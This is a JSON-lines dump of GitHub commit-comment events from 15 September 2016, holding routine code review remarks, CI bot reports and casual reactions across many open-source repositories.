{"id":"4570743017","type":"CommitCommentEvent","actor":{"login":"Acconut"},"repo":{"name":"tus/tusd"},"payload":{"comment":{"id":19044636,"position":null,"line":null,"path":null,"commit_id":"a3f8592d4f74debaa0f344766fd5bf1500ae85e0","created_at":"2016-09-15T21:06:30Z","updated_at":"2016-09-15T21:06:30Z","body":":+1: Would be nice to have a URL which always points to the latest download, such as `https://github.com/tus/tusd/releases/download/latest/tusd_linux_amd64.tar.gz` Guess, I will build one and host it on App Engine for free or so…"}},"created_at":"2016-09-15T21:06:30Z"}
{"id":"4570746746","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19044642,"position":5,"line":18,"path":"src/head_server/bracket/bracket.js","commit_id":"da97dfc9e7013517557704263bc0c779e66d3ac1","created_at":"2016-09-15T21:07:02Z","updated_at":"2016-09-15T21:07:02Z","body":"can you go to localhost:3000/bracket/testData/ and it gets the file?"}},"created_at":"2016-09-15T21:07:02Z"}
{"id":"4570750754","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19044651,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-15T21:07:44Z","updated_at":"2016-09-15T21:07:44Z","body":"I would prefer the minimum code necessary that still avoids a crash in the case of an unknown or ignore node."}},"created_at":"2016-09-15T21:07:44Z"}
{"id":"4570751952","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044653,"position":22,"line":22,"path":"server/db/models/products.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T21:07:57Z","updated_at":"2016-09-15T21:07:57Z","body":"maybe url validation"}},"created_at":"2016-09-15T21:07:57Z"}
{"id":"4570753897","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044658,"position":22,"line":22,"path":"server/db/models/products.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T21:08:19Z","updated_at":"2016-09-15T21:08:19Z","body":"also `defaultValue`"}},"created_at":"2016-09-15T21:08:19Z"}
{"id":"4570757640","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19044666,"position":null,"line":null,"path":null,"commit_id":"f2de602a35560c375787a4d0b9784d8053f342c3","created_at":"2016-09-15T21:09:00Z","updated_at":"2016-09-15T21:09:00Z","body":"Related to: backdrop/backdrop-issues#2189 "}},"created_at":"2016-09-15T21:09:00Z"}
{"id":"4570758895","type":"CommitCommentEvent","actor":{"login":"WJLiddy"},"repo":{"name":"jhoak/kjcc"},"payload":{"comment":{"id":19044670,"position":null,"line":null,"path":null,"commit_id":"ec763d9705251dfd43434fdcfab902821dfabdce","created_at":"2016-09-15T21:09:13Z","updated_at":"2016-09-15T21:09:13Z","body":"The word of the L<sub><sup>ORD</sup></sub>."}},"created_at":"2016-09-15T21:09:13Z"}
{"id":"4570760570","type":"CommitCommentEvent","actor":{"login":"sergiocampama"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19044677,"position":13,"line":80,"path":"objectivec/GPBUtilities.m","commit_id":"b1b77a5749c61ed65b605a3df6b399c18be071bb","created_at":"2016-09-15T21:09:32Z","updated_at":"2016-09-15T21:09:32Z","body":"objcRuntimeVersion"}},"created_at":"2016-09-15T21:09:32Z"}
{"id":"4570763106","type":"CommitCommentEvent","actor":{"login":"MrAE"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":19044686,"position":null,"line":null,"path":null,"commit_id":"dd8a71fca12e4d6b9d307767f340c97a39248f9d","created_at":"2016-09-15T21:10:01Z","updated_at":"2016-09-15T21:10:01Z","body":"@jovo [Heat maps and covariance plots](http://docs.neurodata.io/synaptome-stats/Code/BIC.html#heat-maps-of-cluster-means)"}},"created_at":"2016-09-15T21:10:01Z"}
{"id":"4570767869","type":"CommitCommentEvent","actor":{"login":"revett"},"repo":{"name":"vidsy/static-assets"},"payload":{"comment":{"id":19044697,"position":null,"line":null,"path":null,"commit_id":"1936f2efbf2938b82846717031dab837d30162bd","created_at":"2016-09-15T21:10:54Z","updated_at":"2016-09-15T21:10:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;s4w2BKeI&#x2F;504-sa-add-hard-coded-insights-popup-values-from-ac\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [SA] Add hard-coded insights popup values from AC</a>"}},"created_at":"2016-09-15T21:10:54Z"}
{"id":"4570768404","type":"CommitCommentEvent","actor":{"login":"ItsCEED"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":19044698,"position":null,"line":null,"path":null,"commit_id":"2cdf31a1ede27dad6b55083d4ba0a52935acc591","created_at":"2016-09-15T21:11:00Z","updated_at":"2016-09-15T21:11:00Z","body":"O.M.G Im dead. HAHAHHAHA"}},"created_at":"2016-09-15T21:11:00Z"}
{"id":"4570770316","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19044704,"position":null,"line":null,"path":null,"commit_id":"15f48a34f60e46eef6f68fd3c59a816d36d866e8","created_at":"2016-09-15T21:11:22Z","updated_at":"2016-09-15T21:11:22Z","body":"a) Before the recent changes, SEE was not taking pins into consideration. \r\n\r\nb) Recent work by pb consider them until some \"pinners\" are removed in the SEE calculation.\r\nPatches trying to define more exactly the \"pinners\" are struggling.\r\n\r\nc) So how about always exclude the pinned pieces from the SEE calculation ?"}},"created_at":"2016-09-15T21:11:22Z"}
{"id":"4570773601","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044711,"position":17,"line":17,"path":"server/db/models/products.js","commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T21:12:03Z","updated_at":"2016-09-15T21:12:03Z","body":"nice to have a limitation for the description text "}},"created_at":"2016-09-15T21:12:03Z"}
{"id":"4570775426","type":"CommitCommentEvent","actor":{"login":"chrism333"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19044717,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-15T21:12:26Z","updated_at":"2016-09-15T21:12:26Z","body":"Hi @jypma, Thanks for your interest! Yes it has been a while. Yalla is basically an idea that we had while working on an AVR based project. We (actually I think it's mostly me to blame ;) ) weren't saitsfied with programming AVRs in C. I thought there must me a nice way to do it in C++. After programming AVRs in C++ for multiple years and trying various things, I finally found a way to use C++11 and templates to create a nice type system for implementing registers. So instead of working on our actual project, we started Yalla ;) \r\n\r\nTo answer your questions: Yes its all handcoded! @elli89 create some snippets for sublime to ease the work a bit, but its still very tedious. If you are intersted you should give @salkinium's link a look and maybe create some scripts that read the memory maps and translate it to c++ code.\r\n\r\nThe reaseon that we didn't continue working on Yalla (besides having less and less time) is that we discoverd [xpcc](https://github.com/roboterclubaachen/xpcc). @salkinium too modest to mention it ;P? It is very close to what we intended to build (although xpcc has no concept for typed register abstraction) and also targets non AVR-based platforms. Its great when you can simply remove your AVR-board, add a STM32 board, do some rewiring, adopt the used ports in your code, and voilá the same application runs on the new platform.\r\n\r\nIn the end, I have to agree with the argument that @salkinium made in the research that he linked. While a nice typed abstraction for memory mapped registers is really nice to have, it is seldom worth the effort. A well written HAL is way more important.\r\n\r\nAlthough, I don't have much time for this in the moment, I am stil very interested in this stuff. So let me know when you make some progress! Also feel free to ask any other questions you might have."}},"created_at":"2016-09-15T21:12:26Z"}
{"id":"4570778316","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19044724,"position":67,"line":126,"path":"backend/globaleaks/db/__init__.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-15T21:12:58Z","updated_at":"2016-09-15T21:12:58Z","body":"this is simply a reorder, you will find this code up."}},"created_at":"2016-09-15T21:12:58Z"}
{"id":"4570780154","type":"CommitCommentEvent","actor":{"login":"jeremyfelt"},"repo":{"name":"washingtonstateuniversity/fin-ad-base-theme"},"payload":{"comment":{"id":19044730,"position":8,"line":56,"path":"inc/builder.php","commit_id":"81e15b305224a31a2a7a75f2348227adc51bdcc8","created_at":"2016-09-15T21:13:21Z","updated_at":"2016-09-15T21:13:21Z","body":"I may not be reading this correctly, but it seems like `isset( $section['columns'] ) !== $section['columns']` would evaluate as `true !== $section['columns']` if set and `false !== $section['columns']` if not set. Is that intentional?"}},"created_at":"2016-09-15T21:13:21Z"}
{"id":"4570782164","type":"CommitCommentEvent","actor":{"login":"chris3torek"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19044736,"position":18,"line":59,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"977d14df48bd85ee3d84b5a3ba1c8d396c99c025","created_at":"2016-09-15T21:13:44Z","updated_at":"2016-09-15T21:13:44Z","body":"Not a new thing (just moved from another placement), but: if the stream socket \"breaks up\" a utf-8 sequence badly, you'll get a decode error here.  To fix that you would have to accumulate everything and do one en-masse decode at the end, or catch decode errors, or something like that.\r\n\r\nExample:\r\n\r\n```$ python3\r\n>>> s = 'funky \\u1331 char'\r\n>>> s.encode('utf8')\r\nb'funky \\xe1\\x8c\\xb1 char'\r\n>>> s.encode('utf8')[0:7]\r\nb'funky \\xe1'\r\n>>> s.encode('utf8')[0:7].decode('utf8')\r\nTraceback (most recent call last):\r\n  File \"<stdin>\", line 1, in <module>\r\nUnicodeDecodeError: 'utf-8' codec can't decode byte 0xe1 in position 6: unexpected end of data```"}},"created_at":"2016-09-15T21:13:44Z"}
{"id":"4570782653","type":"CommitCommentEvent","actor":{"login":"vgkholla"},"repo":{"name":"linkedin/ambry"},"payload":{"comment":{"id":19044738,"position":5,"line":196,"path":"ambry-router/src/test/java/com.github.ambry.router/NonBlockingRouterTest.java","commit_id":"0e06bbb80689670b2683582138ddbbf6faa2ac5e","created_at":"2016-09-15T21:13:51Z","updated_at":"2016-09-15T21:13:51Z","body":"doc"}},"created_at":"2016-09-15T21:13:51Z"}
{"id":"4570782943","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19044740,"position":13,"line":80,"path":"objectivec/GPBUtilities.m","commit_id":"b1b77a5749c61ed65b605a3df6b399c18be071bb","created_at":"2016-09-15T21:13:54Z","updated_at":"2016-09-15T21:13:54Z","body":"Done (and we missed that last time around…)"}},"created_at":"2016-09-15T21:13:54Z"}
{"id":"4570786648","type":"CommitCommentEvent","actor":{"login":"thijstriemstra"},"repo":{"name":"FooDeas/raspberrypi-ua-netinst"},"payload":{"comment":{"id":19044743,"position":null,"line":null,"path":null,"commit_id":"d7d670f459dbc8ef975d192f902d419a01d628a0","created_at":"2016-09-15T21:14:32Z","updated_at":"2016-09-15T21:14:32Z","body":"I'll use `xzcat raspberrypi-ua-netinst-git-78be4ab.img.xz | sudo dd bs=4M of=/dev/sdc` from now on."}},"created_at":"2016-09-15T21:14:32Z"}
{"id":"4570787214","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-isantepluspatientdashboard"},"payload":{"comment":{"id":19044745,"position":2,"line":2,"path":"omod/src/main/webapp/resources/htmlforms/Vaccination.xml","commit_id":"d552abd49e3549524518779e1ebe2d46d1142280","created_at":"2016-09-15T21:14:39Z","updated_at":"2016-09-15T21:14:39Z","body":"I am actually not using form uuids at all for ui linkage, i think i missed that comprehensive way, i definitely need to re-look into it, otherwise for now uuid seems to me as the best way to unify the form at DB level"}},"created_at":"2016-09-15T21:14:39Z"}
{"id":"4570791545","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19044752,"position":64,"line":123,"path":"backend/globaleaks/db/__init__.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-15T21:15:30Z","updated_at":"2016-09-15T21:15:30Z","body":"@NSkelsey : i think you have doubts in what is the decorator @inlineCallbacks;\r\n\r\nit doesnt make easily the function syncronous, but make that function return a deferred and then it caller hierarchy have all to handle the hierarchy. for example the function you written here (the inline_version_update) should be called with a yield requiring the parent function to have an inlinecallback as well. this is why i rewritten using an explicit store and avoiding to use the @transact decorator.\r\n\r\n\r\n"}},"created_at":"2016-09-15T21:15:30Z"}
{"id":"4570793864","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19044755,"position":109,"line":227,"path":"backend/globaleaks/db/__init__.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-15T21:15:59Z","updated_at":"2016-09-15T21:15:59Z","body":"code all moved in migration.py (a little simplified)"}},"created_at":"2016-09-15T21:15:59Z"}
{"id":"4570795217","type":"CommitCommentEvent","actor":{"login":"stopiccot"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19044757,"position":null,"line":null,"path":null,"commit_id":"fdca75b4b0c134ea41f1c819f83bf3c38eceb889","created_at":"2016-09-15T21:16:18Z","updated_at":"2016-09-15T21:16:18Z","body":"Also known as i18n"}},"created_at":"2016-09-15T21:16:18Z"}
{"id":"4570795262","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19044758,"position":null,"line":null,"path":null,"commit_id":"3374874951a73f18635a1d082e5dd0773f5fa701","created_at":"2016-09-15T21:16:18Z","updated_at":"2016-09-15T21:16:18Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-15T21:16:18Z"}
{"id":"4570797400","type":"CommitCommentEvent","actor":{"login":"andyjansson"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19044762,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T21:16:43Z","updated_at":"2016-09-15T21:16:43Z","body":"Why not use `instanceof` here?\r\n\r\n```js\r\nif (promiseOrResult instanceof Promise) {\r\n```"}},"created_at":"2016-09-15T21:16:43Z"}
{"id":"4570799683","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19044765,"position":51,"line":111,"path":"backend/globaleaks/db/migration.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-15T21:17:10Z","updated_at":"2016-09-15T21:17:10Z","body":"@NSkelsey: in your version you had a close() in the except clause.\r\n\r\nthat is not neaded because the finally clause is called always before leaving also the except clause."}},"created_at":"2016-09-15T21:17:10Z"}
{"id":"4570801971","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/all-content-plugin"},"payload":{"comment":{"id":19044774,"position":null,"line":null,"path":null,"commit_id":"8c25bfbfa6d63b0ebb5056208e317fcee9593408","created_at":"2016-09-15T21:17:36Z","updated_at":"2016-09-15T21:17:36Z","body":"*slow applaud*"}},"created_at":"2016-09-15T21:17:36Z"}
{"id":"4570802646","type":"CommitCommentEvent","actor":{"login":"jckarter"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19044775,"position":49,"line":1735,"path":"lib/SILOptimizer/Utils/Local.cpp","commit_id":"5e5dc4a0a6168887c9d3849d084cfc757678259c","created_at":"2016-09-15T21:17:42Z","updated_at":"2016-09-15T21:17:42Z","body":"The `bridgeToObjectiveC` implementation function may still take its argument indirectly even if the value we have is loadable. This comes up with `Optional`, for instance, since its implementation is generic."}},"created_at":"2016-09-15T21:17:42Z"}
{"id":"4570805071","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19044780,"position":null,"line":null,"path":null,"commit_id":"a07d282b31be1d17f4fba6b65aadc7862cf9db41","created_at":"2016-09-15T21:18:10Z","updated_at":"2016-09-15T21:18:10Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2208 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a07d282b31be1d17f4fba6b65aadc7862cf9db41-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-89.32%25-red.svg)</a> \n"}},"created_at":"2016-09-15T21:18:10Z"}
{"id":"4570805402","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19044781,"position":36,"line":198,"path":"backend/globaleaks/models/config.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-15T21:18:13Z","updated_at":"2016-09-15T21:18:13Z","body":"this does the trick of not rewriting because sometimes i got the diry set anyway because anyhow even if the value was the same."}},"created_at":"2016-09-15T21:18:13Z"}
{"id":"4570806653","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19044784,"position":null,"line":null,"path":null,"commit_id":"2bce6f99b9157a632e59cb1f74e7c4035a5872cf","created_at":"2016-09-15T21:18:27Z","updated_at":"2016-09-15T21:18:27Z","body":"![bitmoji](https://render.bitstrips.com/v2/cpanel/10212404-122921288_15-s1-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-15T21:18:27Z"}
{"id":"4570807177","type":"CommitCommentEvent","actor":{"login":"jckarter"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19044786,"position":6,"line":1425,"path":"lib/SILOptimizer/Utils/Local.cpp","commit_id":"7746eda4d9903017d4134dedf79d5123ebea9e83","created_at":"2016-09-15T21:18:31Z","updated_at":"2016-09-15T21:18:31Z","body":"I don't understand this new condition. It should be possible to remove this branch entirely if we're handling things correctly."}},"created_at":"2016-09-15T21:18:31Z"}
{"id":"4570809791","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"gaocegege/Processing.R"},"payload":{"comment":{"id":19044788,"position":null,"line":null,"path":null,"commit_id":"4cfaac550cbd9c647a656ad157559a6f39c4934c","created_at":"2016-09-15T21:19:04Z","updated_at":"2016-09-15T21:19:04Z","body":"wow cece is still working on this project, amazing \\w/ (Happy moon festival"}},"created_at":"2016-09-15T21:19:04Z"}
{"id":"4570812791","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":19044795,"position":107,"line":227,"path":"backend/globaleaks/models/l10n.py","commit_id":"19aae6f302f207ee2f8c7e45f3d4e0980cd75d63","created_at":"2016-09-15T21:19:39Z","updated_at":"2016-09-15T21:19:39Z","body":"i fixed the above code that was strange to me. can you check if i did it right_ (appdata have only node including all the variable)\r\n\r\nprobably we need something about appdata['templates'] that i think we are missing to update."}},"created_at":"2016-09-15T21:19:39Z"}
{"id":"4570812880","type":"CommitCommentEvent","actor":{"login":"jasonvanderslice"},"repo":{"name":"tiy-sat/summer16-tech-voices"},"payload":{"comment":{"id":19044796,"position":4,"line":27,"path":"lib/NewArticle.js","commit_id":"fb09d07810e3b9ca8d70c6b2fac205e2dfcc22dc","created_at":"2016-09-15T21:19:40Z","updated_at":"2016-09-15T21:19:40Z","body":":thum"}},"created_at":"2016-09-15T21:19:40Z"}
{"id":"4570815377","type":"CommitCommentEvent","actor":{"login":"latobarita"},"repo":{"name":"stellar/stellar-core"},"payload":{"comment":{"id":19044800,"position":null,"line":null,"path":null,"commit_id":"900eecbd54fa3c8ca527319a58f5c750ab0771b7","created_at":"2016-09-15T21:20:11Z","updated_at":"2016-09-15T21:20:11Z","body":"some tests failed:\nexception: https://travis-ci.org/stellar/stellar-core/builds/160284230\n"}},"created_at":"2016-09-15T21:20:11Z"}
{"id":"4570816856","type":"CommitCommentEvent","actor":{"login":"jasonvanderslice"},"repo":{"name":"tiy-sat/summer16-tech-voices"},"payload":{"comment":{"id":19044803,"position":9,"line":27,"path":"lib/NewArticle.js","commit_id":"15080a5de12b77683d4912d618541a329fd18c1b","created_at":"2016-09-15T21:20:28Z","updated_at":"2016-09-15T21:20:28Z","body":"📆 "}},"created_at":"2016-09-15T21:20:28Z"}
{"id":"4570819803","type":"CommitCommentEvent","actor":{"login":"jcr"},"repo":{"name":"landportal/drupal"},"payload":{"comment":{"id":19044806,"position":null,"line":null,"path":null,"commit_id":"2f4b3bf84926336a260209bebde08cf094df3784","created_at":"2016-09-15T21:21:00Z","updated_at":"2016-09-15T21:21:00Z","body":"@SergeyDotsenko\r\nthis commit is duplicating an existing view in landcommunity module..."}},"created_at":"2016-09-15T21:21:00Z"}
{"id":"4570820423","type":"CommitCommentEvent","actor":{"login":"jasonvanderslice"},"repo":{"name":"tiy-sat/summer16-tech-voices"},"payload":{"comment":{"id":19044810,"position":4,"line":4,"path":"styles/main.css","commit_id":"e52d072b55fe51157a980242697f5f8c2c0af535","created_at":"2016-09-15T21:21:09Z","updated_at":"2016-09-15T21:21:09Z","body":"✅ ✅ ✅ "}},"created_at":"2016-09-15T21:21:09Z"}
{"id":"4570821412","type":"CommitCommentEvent","actor":{"login":"mathieu-benoit"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":19044814,"position":115,"line":195,"path":"Tasks/SqlAzureDacpacDeployment/Utility.ps1","commit_id":"4cefaf18b6753d0408be6d97715ae86e404e6822","created_at":"2016-09-15T21:21:19Z","updated_at":"2016-09-15T21:21:19Z","body":"Hi @rohit-batra, thank you for your feedback.\r\nIn fact, what I meant was more about the detail of the exception thrown by SqlPackage.exe which looks like to not be catch properly and was wondering if your works could arrange that... but was just wondering...\r\nLocally when I run the exact same command, I have this error message:\r\n\r\n> *** An error occurred during deployment plan generation. Deployment cannot continue.\r\n> A project which specifies SQL Server 2008 as the target platform cannot be published to Microsoft Azure SQL Database v12.\r\n\r\nNote: I fixed it by using this /p:AllowIncompatiblePlatform=True Additional arguments.\r\nThank you!"}},"created_at":"2016-09-15T21:21:19Z"}
{"id":"4570823014","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19044819,"position":5,"line":23,"path":"src/head_server/bracket/bracket.html","commit_id":"5230dd57a9d4c38d6797250455a2804ce1aa385f","created_at":"2016-09-15T21:21:36Z","updated_at":"2016-09-15T21:21:36Z","body":"+1 for future reference, i always get jQuery calls mixed up"}},"created_at":"2016-09-15T21:21:36Z"}
{"id":"4570823826","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"endless-sky/all-content-plugin"},"payload":{"comment":{"id":19044820,"position":null,"line":null,"path":null,"commit_id":"8c25bfbfa6d63b0ebb5056208e317fcee9593408","created_at":"2016-09-15T21:21:46Z","updated_at":"2016-09-15T21:21:46Z","body":"Lmfao.\r\n/World Forge"}},"created_at":"2016-09-15T21:21:46Z"}
{"id":"4570824312","type":"CommitCommentEvent","actor":{"login":"jasonvanderslice"},"repo":{"name":"tiy-sat/summer16-tech-voices"},"payload":{"comment":{"id":19044821,"position":4,"line":6,"path":"index.html","commit_id":"6665eceb8d7234d04df9dba925f5fd31aea1363a","created_at":"2016-09-15T21:21:51Z","updated_at":"2016-09-15T21:21:51Z","body":"🎉 "}},"created_at":"2016-09-15T21:21:51Z"}
{"id":"4570824670","type":"CommitCommentEvent","actor":{"login":"kirill3000"},"repo":{"name":"kirill3000/python"},"payload":{"comment":{"id":19044822,"position":null,"line":null,"path":null,"commit_id":"0e8a33bc51362f0a1a43bb14674c4e87e0253f2c","created_at":"2016-09-15T21:21:55Z","updated_at":"2016-09-15T21:21:55Z","body":"3"}},"created_at":"2016-09-15T21:21:55Z"}
{"id":"4570825203","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19044823,"position":null,"line":null,"path":null,"commit_id":"ef7577f5e48ad1e72a49e672e1eabd5b7d345b4d","created_at":"2016-09-15T21:22:01Z","updated_at":"2016-09-15T21:22:01Z","body":"Rule 50 counter is in plies, not moves. Is it really intended to get negative once beyond 50 plies?"}},"created_at":"2016-09-15T21:22:01Z"}
{"id":"4570825976","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19044825,"position":null,"line":null,"path":null,"commit_id":"fca5fbb36169a7522e6c533df9c322d47e3dc6bb","created_at":"2016-09-15T21:22:10Z","updated_at":"2016-09-15T21:22:10Z","body":"Also see [Issue 277: Library documentation lacks treatment of `-DNDEBUG` and Static Initialization](http://github.com/weidai11/cryptopp/issues/277)."}},"created_at":"2016-09-15T21:22:10Z"}
{"id":"4570827400","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19044829,"position":null,"line":null,"path":null,"commit_id":"553049ba297d89d9e8fbf2204acb40a8a53f5cd6","created_at":"2016-09-15T21:22:26Z","updated_at":"2016-09-15T21:22:26Z","body":"Also see [Issue 277: Library documentation lacks treatment of `-DNDEBUG` and Static Initialization](http://github.com/weidai11/cryptopp/issues/277)."}},"created_at":"2016-09-15T21:22:26Z"}
{"id":"4570833313","type":"CommitCommentEvent","actor":{"login":"davidwhitman"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19044847,"position":null,"line":null,"path":null,"commit_id":"04e1166b673c6d38d79ec531fdfc68c132e763ee","created_at":"2016-09-15T21:23:31Z","updated_at":"2016-09-15T21:23:31Z","body":"damn, nice catch"}},"created_at":"2016-09-15T21:23:31Z"}
{"id":"4570833543","type":"CommitCommentEvent","actor":{"login":"shajrawi"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19044849,"position":6,"line":1425,"path":"lib/SILOptimizer/Utils/Local.cpp","commit_id":"7746eda4d9903017d4134dedf79d5123ebea9e83","created_at":"2016-09-15T21:23:33Z","updated_at":"2016-09-15T21:23:33Z","body":"Yeah that's the only condition I'm not sure how to handle / asked for advise in :)"}},"created_at":"2016-09-15T21:23:33Z"}
{"id":"4570835596","type":"CommitCommentEvent","actor":{"login":"jmcphers"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19044857,"position":null,"line":null,"path":null,"commit_id":"24cb4ec0c6325d583668c472d1fdfbdd8d6819c1","created_at":"2016-09-15T21:23:59Z","updated_at":"2016-09-15T21:23:59Z","body":"@kevinushey your feedback welcome here. This fixes an issue wherein dismissing the MathJax output could cause subsequent renders to come up blank in Safari. There are two somewhat orthogonal changes here:\r\n\r\n1. If MathJax fails to render with a `[ Math Processing Error ]`, we now wait a few ms and then try to render again. If we run out of retries, we just go ahead and show the error (this behavior differs from the previous one, in which the error remained hidden and the output was blank). In my testing two retries were sufficient to have a good chance of success.\r\n\r\n2. We formerly deferred MathJax rendering to give the line widget a chance to attach to the DOM. Unfortunately, `PinnedLineWidget` instances don't attach to the editor right away; they wait until the next render tick. The second part of the change delays rendering until the line widget has actually been attached to the editor. In my testing, this dropped the retry error rate to 0 (i.e. renders were always successful the first time). "}},"created_at":"2016-09-15T21:23:59Z"}
{"id":"4570836854","type":"CommitCommentEvent","actor":{"login":"planobrett"},"repo":{"name":"nicktator22/Calculator-"},"payload":{"comment":{"id":19044862,"position":5,"line":20,"path":"CalculatorEdit.java","commit_id":"52c0c0429cec86bae902b59ee811f152d38928c4","created_at":"2016-09-15T21:24:16Z","updated_at":"2016-09-15T21:24:16Z","body":"The class name should be CapitalCase, and it should be named the same as the file name, so the class name should also be CalculatorEdit"}},"created_at":"2016-09-15T21:24:16Z"}
{"id":"4570839695","type":"CommitCommentEvent","actor":{"login":"shajrawi"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19044874,"position":49,"line":1735,"path":"lib/SILOptimizer/Utils/Local.cpp","commit_id":"5e5dc4a0a6168887c9d3849d084cfc757678259c","created_at":"2016-09-15T21:24:48Z","updated_at":"2016-09-15T21:24:48Z","body":"Will remove this assert."}},"created_at":"2016-09-15T21:24:48Z"}
